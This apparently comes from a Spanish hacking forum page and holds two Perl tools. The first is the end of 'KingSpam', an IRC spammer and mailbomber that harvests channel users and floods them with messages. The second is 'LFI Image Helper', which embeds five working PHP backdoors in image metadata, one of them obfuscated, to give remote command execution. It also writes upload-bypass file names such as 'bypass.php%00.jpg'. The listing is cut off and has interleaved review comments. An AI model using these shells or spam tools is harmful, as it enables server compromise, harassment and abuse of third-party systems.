  512.                      . $spamnow[ rand(@spamnow) ] . "\r\n";
  513.                    $contador++;
  514.                }
  515.  
  516.                foreach $names (@nicks) {
  517.                    chomp $names;
  518.                    sleep($timeout);
  519.                    unless ( $nombre eq $names ) {
  520.                        $names =~ s/\@//;
  521.                        $names =~ s/\+//;
  522.                        print $socket
  523.                          "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
  524.                        printear("[+] Spam to user $names : ");
  525.                        print "OK\n";
  526.                    }
  527.                    $termine++;
  528.                }
  529.                $contador = 0;
  530.                print "\n";
  531.            }
  532.  
  533.            if ( $termine eq int(@nicks) ) {
  534.                $socket->close();
  535.                last;
  536.            }
  537.  
  538.        }
  539.    }
  540.    else {
  541.        printear("[-] Error\n");
  542.        $socket->close();
  543.    }
  544.  
  545. }
  546.  
  547. sub buscar_usuarios {
  548.  
  549.    my $hostname = $_[0];
  550.    my $port     = $_[1];
  551.    my $nombre   = $_[2];
  552.    my $canal    = $_[3];
  553.  
  554.    if (
  555.        my $socket = new IO::Socket::INET(
  556.            PeerAddr => $hostname,
  557.            PeerPort => $port,
  558.            Proto    => "tcp"
  559.        )
  560.      )
  561.    {
  562.  
  563.        print $socket "NICK $nombre\r\n";
  564.        print $socket "USER $nombre 1 1 1 1\r\n";
  565.        print $socket "JOIN $canal\r\n";
  566.  
  567.        while ( my $log = <$socket> ) {
  568.  
  569.            chomp $log;
  570.  
  571.            if ( $log =~ /^PING(.*)$/i ) {
  572.                print $socket "PONG $1\r\n";
  573.            }
  574.  
  575.            if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {
  576.                my $pro = $4;
  577.                chop $pro;
  578.                $pro =~ s/$nombre//;
  579.                my @nicks = split " ", $pro;
  580.                $socket->close();
  581.                return @nicks;
  582.            }
  583.  
  584.        }
  585.    }
  586. }
  587.  
  588. sub buscar_canales {
  589.  
  590.    my @resultado;
  591.  
  592.    my $hostname = $_[0];
  593.    my $port     = $_[1];
  594.    my $nombre   = $_[2];
  595.  
  596.    if (
  597.        my $socket = new IO::Socket::INET(
  598.            PeerAddr => $hostname,
  599.            PeerPort => $port,
  600.            Proto    => "tcp"
  601.        )
  602.      )
  603.    {
  604.  
  605.        print $socket "NICK $nombre\r\n";
  606.        print $socket "USER $nombre 1 1 1 1\r\n";
  607.        print $socket "LIST\r\n";
  608.  
  609.        while ( my $log = <$socket> ) {
  610.  
  611.            if ( $log =~ /322 (.*?) (.*?) (.*?) :/ ) {
  612.                my $canal    = $2;
  613.                my $cantidad = $3;
  614.                push( @resultado, $canal . "-soy_un_limite-" . $cantidad );
  615.            }
  616.  
  617.            if ( $log =~ /:End of \/LIST/ ) {
  618.                last;
  619.            }
  620.  
  621.        }
  622.  
  623.        $socket->close;
  624.  
  625.        return @resultado;
  626.  
  627.    }
  628.  
  629. }
  630.  
  631. sub listar_canales {
  632.  
  633.    my $host = $_[0];
  634.    my $port = $_[1];
  635.    my $nick = $_[2];
  636.    my $file = $_[3];
  637.  
  638.    printear_titulo("[+] Serching channels ...\n\n");
  639.    my @encontrados = buscar_canales( $host, $port, $nick );
  640.    if ( int(@encontrados) eq "0" or int(@encontrados) eq "1" ) {
  641.        printear_titulo("[-] Channels not found\n");
  642.    }
  643.    else {
  644.        printearf_titulo( "Channels", "Users" );
  645.        print "\n";
  646.        for my $encontrado (@encontrados) {
  647.            if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
  648.                my $canal    = $1;
  649.                my $cantidad = $2;
  650.                printearf( $canal, $cantidad );
  651.  
  652.                if ( $file ne "" ) {
  653.                    savefile( $file, $canal );
  654.                }
  655.  
  656.            }
  657.        }
  658.    }
  659.  
  660. }
  661.  
  662. sub sendmail {
  663.  
  664. ## Function Based on : http://code.activestate.com/lists/pdk/5351/
  665. ## Credits : Thanks to Phillip Richcreek and Eric Promislow
  666.  
  667.    my (
  668.        $host, $port, $username, $password, $from, $cc,
  669.        $bcc,  $to,   $asunto,   $mensaje,  $file
  670.    ) = @_;
  671.  
  672.    $correo = Win32::OLE->new('CDO.Message');
  673.  
  674.    $correo->Configuration->Fields->SetProperty( "Item",
  675.        'http://schemas.microsoft.com/cdo/configuration/sendusername',
  676.        $username );
  677.    $correo->Configuration->Fields->SetProperty( "Item",
  678.        'http://schemas.microsoft.com/cdo/configuration/sendpassword',
  679.        $password );
  680.    $correo->Configuration->Fields->SetProperty( "Item",
  681.        'http://schemas.microsoft.com/cdo/configuration/smtpserver', $host );
  682.    $correo->Configuration->Fields->SetProperty( "Item",
  683.        'http://schemas.microsoft.com/cdo/configuration/smtpserverport',
  684.        $port );
  685.    $correo->Configuration->Fields->SetProperty( "Item",
  686.        'http://schemas.microsoft.com/cdo/configuration/smtpusessl', 1 );
  687.    $correo->Configuration->Fields->SetProperty( "Item",
  688.        'http://schemas.microsoft.com/cdo/configuration/sendusing', 2 );
  689.    $correo->Configuration->Fields->SetProperty( "Item",
  690.        'http://schemas.microsoft.com/cdo/configuration/smtpauthenticate', 1 );
  691.    $correo->Configuration->Fields->Update();
  692.  
  693.    if ( -f $file ) {
  694.        $correo->AddAttachment($file);
  695.    }
  696.  
  697.    $correo->{From}     = $from;
  698.    $correo->{CC}       = $cc;
  699.    $correo->{BCC}      = $bcc;
  700.    $correo->{To}       = $to;
  701.    $correo->{Subject}  = $asunto;
  702.    $correo->{TextBody} = $mensaje;
  703.    $correo->Send();
  704.  
  705. }
  706.  
  707. # More Functions
  708.  
  709. sub printearf_titulo {
  710.    cprintf( "\x0310" . "%-32s  %s" . "\x030\n", $_[0], $_[1] );
  711. }
  712.  
  713. sub printearf {
  714.    cprintf( "\x036" . "%-32s  %s" . "\x030\n", $_[0], $_[1] );
  715. }
  716.  
  717. sub printear {
  718.    cprint( "\x036" . $_[0] . "\x030" );
  719.    return "";
  720. }
  721.  
  722. sub printear_logo {
  723.    cprint( "\x037" . $_[0] . "\x030" );
  724.    return ""
  725.  
  726. }
  727.  
  728. sub printear_titulo {
  729.    cprint( "\x0310" . $_[0] . "\x030" );
  730.    return "";
  731. }
  732.  
  733. sub savefile {
  734.    open( SAVE, ">>" . $_[0] );
  735.    print SAVE $_[1] . "\n";
  736.    close SAVE;
  737. }
  738.  
  739. sub loadfile {
  740.    if ( -f $_[0] ) {
  741.        my @words;
  742.        my @r;
  743.        open( FILE, $_[0] );
  744.        @words = <FILE>;
  745.        close FILE;
  746.        for (@words) {
  747.            push( @r, $_ );
  748.        }
  749.        return (@r);
  750.    }
  751.    else {
  752.        printear("\n[-] File not found\n\n");
  753.        copyright();
  754.    }
  755. }
  756.  
  757. sub sintax {
  758.    printear("[+] Sintax : ");
  759.    print "perl $0 <option> <value>\n";
  760.    printear("\n[+] Options : \n\n");
  761.    print
  762. "-get_channels <host> -port <port> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
  763.    print
  764. "-get_users <host> -port <port> -channel <channel> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
  765.    print
  766. "-spam_channel <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel\n";
  767.    print
  768. "-spam_channel_forever <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel Forever\n";
  769.    print
  770. "-spam_server <host> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a server\n";
  771.    print
  772. "-spam_servers_list <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in multiple servers\n";
  773.    print
  774. "-spam_targets <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in servers & channels saved\n";
  775.    print "-mailbomber : Open MailBomber\n";
  776.    printear("\n[+] Example : \n\n");
  777.    print "perl kingspam.pl -get_channels localhost\n";
  778.    print "perl kingspam.pl -get_users localhost -channel #locos\n";
  779.    print
  780. "perl kingspam.pl -spam_channel localhost -channel #locos -spam_file c:/spam.txt\n";
  781.    print
  782. "perl kingspam.pl -spam_channel_forever localhost -channel #locos -spam_file c:/spam.txt\n";
  783.    print "perl kingspam.pl -spam_server localhost -spam_file c:/spam.txt\n";
  784.    print
  785. "perl kingspam.pl -spam_servers_file c:/servers.txt -nick ClapTrap -spam_file c:/spam.txt\n";
  786.    print
  787.      "perl kingspam.pl -spam_targets c:/servers.txt -spam_file c:/spam.txt\n";
  788.    print "perl kingspam.pl -mailbomber\n";
  789. }
  790.  
  791. sub head {
  792.    printear_logo("\n-- == KingSpam 1.0 == --\n\n\n");
  793. }
  794.  
  795. sub copyright {
  796.    printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
  797.    exit(1);
  798. }
  799.  
  800. # The End ?
  801.  

Un video con ejemplos de uso :



Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.
8  Programación / Scripting / [Perl] LFI Image Helper 0.8 en: 8 Mayo 2015, 15:57
Un simple script en Perl para colocar código de phpshells en imágenes. El script tiene las siguientes opciones:

  • Listar todos los Tags de la imagen con contenido
  • Listar solo los Tags
  • Leer el valor de cierto Tag
  • Crear un Tag nuevo
  • Editar un Tag
  • Borrar un Tag
  • Infectar una imagen con un backdoor conocido en PHP

El codigo :

Código
  1. #!usr/bin/perl
  2. #LFI Image Helper 0.8
  3. #(C) Doddy Hackman 2015
  4. #ppm install  http://trouchelle.com/ppm/Image-ExifTool.ppd
  5. #
  6. #Array @shells based on : OhNo - Evil Image Builder By Hood3dRob1n
  7. #Thanks to Hood3dRob1n
  8. #
  9. #Dump Values
  10. #Based on :http://www.nntp.perl.org/group/perl.beginners/2012/02/msg119913.html
  11. #Thanks to Ken Slater
  12. #
  13. use Image::ExifTool;
  14. use Getopt::Long;
  15. use Color::Output;
  16. Color::Output::Init;
  17.  
  # Catalogue of the PHP payload strings this script can write into an image
  # tag. Every entry carries three keys:
  #   nombre  - display name (matches the five options printed in the
  #             --backdoor branch further down)
  #   codigo  - the PHP source, kept as a single-quoted literal so Perl
  #             never interpolates it
  #   ejemplo - the query-string parameter the payload reads
  # Slot 0 is an empty hash; presumably it lets menu options 1-5 index the
  # array directly -- confirm against backdoor_tag().
  #
  # Detection note: the one trait all five literals share is a PHP open tag
  # ("<?php" or "<?") sitting inside image metadata, which is a practical
  # thing to scan uploads for. Entry 4 contains no function name at all, so
  # keyword matching on system/eval/shell_exec alone does not catch it.
  my @shells = ( {} );

  # 1: passes $_GET["cmd"] to system().
  push @shells, {
      nombre  => 'Simple Backdoor',
      codigo  => '<?php system($_GET["cmd"]);exit(1); ?>',
      ejemplo => '?cmd=',
  };

  # 2: passes $_REQUEST[cmd] to system(), with error reporting disabled.
  push @shells, {
      nombre  => 'System Shell',
      codigo  => '<?error_reporting(0);print(___);system($_REQUEST[cmd]);print(___);die;?>',
      ejemplo => '?cmd=',
  };

  # 3: passes $_REQUEST[cmd] to eval(), with error reporting disabled.
  push @shells, {
      nombre  => 'Eval Shell',
      codigo  => '<?error_reporting(0);print(___);eval($_REQUEST[cmd]);print(___);die;?>',
      ejemplo => '?cmd=',
  };

  # 4: written only with punctuation and underscore variables; the literal
  # must be kept byte-for-byte.
  push @shells, {
      nombre  => 'Sneaky Shell',
      codigo  => '<?php @$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_] );?>',
      ejemplo => '?0=',
  };

  # 5: passes $_GET["r0ng"] to shell_exec() and echoes the output.
  push @shells, {
      nombre  => 'r0ng Shell',
      codigo  => '<?if($_GET["r0ng"]){echo"<pre>".shell_exec($_GET["r0ng"]);}?>',
      ejemplo => '?r0ng=',
  };
  63.  
  # Command-line switches; every one takes a string argument.
  # The first eight each hold the path of the file to work on and select the
  # operation in the dispatch chain below (which tests each path with -f).
  # "tag" and "value" carry the tag name and tag content for the
  # read/make/update/delete operations; "file" is handed to backdoor_tag()
  # and is the output base name in the bypass branch.
  # NOTE(review): the target variables are undeclared package globals (no
  # "use strict" is visible in this listing) and the return value of
  # GetOptions is ignored, so a malformed command line is not rejected here.
  my @especificacion = (
      'dump_all=s'   => \$dump_all,
      'dump_tags=s'  => \$dump_tags,
      'read_tag=s'   => \$read_tag,
      'tag=s'        => \$tag,
      'make_tag=s'   => \$make_tag,
      'value=s'      => \$value,
      'update_tag=s' => \$update_tag,
      'delete_tag=s' => \$delete_tag,
      'backdoor=s'   => \$backdoor,
      'bypass=s'     => \$bypass,
      'file=s'       => \$file,
  );
  GetOptions(@especificacion);

  # Called unconditionally, before any option is acted on.
  head();
  79.  
  80. if ($dump_all) {
  81.  
  82.    if ( -f $dump_all ) {
  83.        printear_titulo("[+] Finding information in : ");
  84.        print $dump_all. "\n\n";
  85.        dump_all($dump_all);
  86.    }
  87.    else {
  88.        printear("[-] File not found\n");
  89.    }
  90.  
  91. }
  92. elsif ($dump_tags) {
  93.  
  94.    if ( -f $dump_tags ) {
  95.        printear_titulo("[+] Finding tags in : ");
  96.        print $dump_tags. "\n\n";
  97.        dump_tags($dump_tags);
  98.    }
  99.    else {
  100.        printear("[-] File not found\n");
  101.    }
  102. }
  103. elsif ($read_tag) {
  104.  
  105.    if ( -f $read_tag ) {
  106.        printear_titulo("[+] Finding tag value of $tag in : ");
  107.        print $read_tag. "\n\n";
  108.        read_tag( $read_tag, $tag );
  109.    }
  110.    else {
  111.        printear("[-] File not found\n");
  112.    }
  113.  
  114. }
  115.  
  116. elsif ($make_tag) {
  117.  
  118.    if ( -f $make_tag ) {
  119.  
  120.        printear_titulo("[+] Photo : ");
  121.        print $make_tag. "\n";
  122.        printear_titulo("[+] Name : ");
  123.        print $tag. "\n";
  124.        printear_titulo("[+] Value : ");
  125.        print $value. "\n\n";
  126.  
  127.        printear("[+] Making tag $tag ...\n\n");
  128.  
  129.        make_tag( $make_tag, $tag, $value );
  130.  
  131.    }
  132.    else {
  133.        printear("[-] File not found\n");
  134.    }
  135. }
  136. elsif ($update_tag) {
  137.  
  138.    if ( -f $update_tag ) {
  139.  
  140.        printear_titulo("[+] Photo : ");
  141.        print $update_tag. "\n";
  142.        printear_titulo("[+] Name : ");
  143.        print $tag. "\n";
  144.        printear_titulo("[+] Value : ");
  145.        print $value. "\n\n";
  146.  
  147.        printear("[+] Updating tag $tag ...\n\n");
  148.  
  149.        update_tag( $update_tag, $tag, $value );
  150.  
  151.    }
  152.    else {
  153.        printear("[-] File not found\n");
  154.    }
  155. }
  156. elsif ($delete_tag) {
  157.  
  158.    if ( -f $delete_tag ) {
  159.        printear_titulo("[+] Deleting tag $tag in : ");
  160.        print $delete_tag. "\n\n";
  161.        delete_tag( $delete_tag, $tag );
  162.    }
  163.    else {
  164.        printear("[-] File not found\n");
  165.    }
  166.  
  167. }
  168. elsif ($backdoor) {
  169.  
  170.    if ( -f $backdoor ) {
  171.  
  172.        printear_titulo("[+] Photo : ");
  173.        print $backdoor. "\n\n";
  174.  
  175.        printear("[+] 1 : ");
  176.        print "Simple Backdoor\n";
  177.        printear("[+] 2 : ");
  178.        print "System Shell\n";
  179.        printear("[+] 3 : ");
  180.        print "Eval Shell\n";
  181.        printear("[+] 4 : ");
  182.        print "Sneaky Shell\n";
  183.        printear("[+] 5 : ");
  184.        print "r0ng Shell\n";
  185.  
  186.        printear_titulo("\n[+] Option : ");
  187.        chomp( my $opcion = <stdin> );
  188.  
  189.        backdoor_tag( $backdoor, $opcion, $file );
  190.  
  191.    }
  192.    else {
  193.        printear("[-] File not found\n");
  194.    }
  195.  
  196. }
  197. elsif ($bypass) {
  198.  
  199.    if ( -f $bypass ) {
  200.  
  201.        my $source = readfile($bypass);
  202.  
  203.        printear_titulo("[+] PHP Shell : ");
  204.        print $bypass. "\n\n";
  205.  
  206.        printear("[+] 1 : ");
  207.        print "bypass.jpg.php\n";
  208.        printear("[+] 2 : ");
  209.        print "bypass.php;test.jpg\n";
  210.        printear("[+] 3 : ");
  211.        print "bypass.php%00.jpg\n";
  212.  
  213.        printear_titulo("\n[+] Option : ");
  214.        chomp( my $opcion = <stdin> );
  215.  
  216.        if ( $opcion eq "1" ) {
  217.            savefile( $file . ".jpg.php", $source );
  218.            chmod 0777, $file . ".jpg.php";
  219.        }
  220.        elsif ( $opcion eq "2" ) {
  221.            savefile( $file . ".php;test.jpg", $source );
  222.            chmod 0777, $file . ".php;test.jpg";
  223.        }
  224.        elsif ( $opcion eq "3" ) {
  225.            savefile(